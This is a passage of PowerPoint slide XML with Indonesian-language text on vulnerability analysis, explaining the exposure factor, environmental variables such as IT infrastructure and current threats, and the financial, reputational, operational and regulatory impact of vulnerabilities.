              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksposur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksesibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksposur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (EF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dampak</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Variabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lingkungan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>variabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
